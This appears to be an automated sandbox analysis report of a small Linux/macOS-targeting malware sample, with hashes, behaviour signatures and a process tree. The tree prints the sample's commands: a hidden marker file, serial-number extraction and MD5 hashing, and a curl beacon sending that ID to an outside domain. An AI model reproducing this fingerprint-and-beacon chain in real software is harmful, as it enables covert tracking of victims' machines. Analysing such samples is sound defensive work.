Analysis
-
max time kernel
149s -
max time network
1s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
29-07-2024 07:40
Static task
static1
Behavioral task
behavioral1
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
debian9-mipsel-20240729-en
General
-
Target
3c6492a33885e363cae2841e0597c730_JaffaCakes118
-
Size
10KB
-
MD5
3c6492a33885e363cae2841e0597c730
-
SHA1
99d5f88fb1a33f321aa614cfe792200bdf9eba5c
-
SHA256
ead1f229097555af8724321021bb8bb5421947e67cd244065dbd2990a6dcdb49
-
SHA512
302bdb0ffb3be9285e7453e04d6067ca03ebdb21af5c0f26e6cb982de1c91631bffb2aab5e2f3a298a54b93337e1b510bee87e3855503a246a130bcc87ce5193
-
SSDEEP
192:g0AjH8A5Zjpcjxi3LKVMyIu8bXkvLvTWM3Tk3Sw3a8na8:g1cA5t8xgNb0/mVLnP
Malware Config
Signatures
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc process File opened for reading /proc/cpuinfo curl -
Reads runtime system information 3 IoCs
Reads data from /proc virtual filesystem.
Processes:
awkcurldescription ioc process File opened for reading /proc/self/maps awk File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl
Processes
-
/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes1181⤵PID:642
-
/usr/bin/touchtouch "/root/Library/Application Support/.upd2029"2⤵PID:644
-
/usr/bin/awkawk "-F\"" "/IOPlatformSerialNumber/{print \$(NF-1)}"2⤵
- Reads runtime system information
PID:647 -
/usr/bin/trtr -d "\\n"2⤵PID:648
-
/usr/bin/opensslopenssl md52⤵PID:649
-
/usr/bin/curlcurl -s -L "http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e"2⤵
- Checks CPU configuration
- Reads runtime system information
PID:654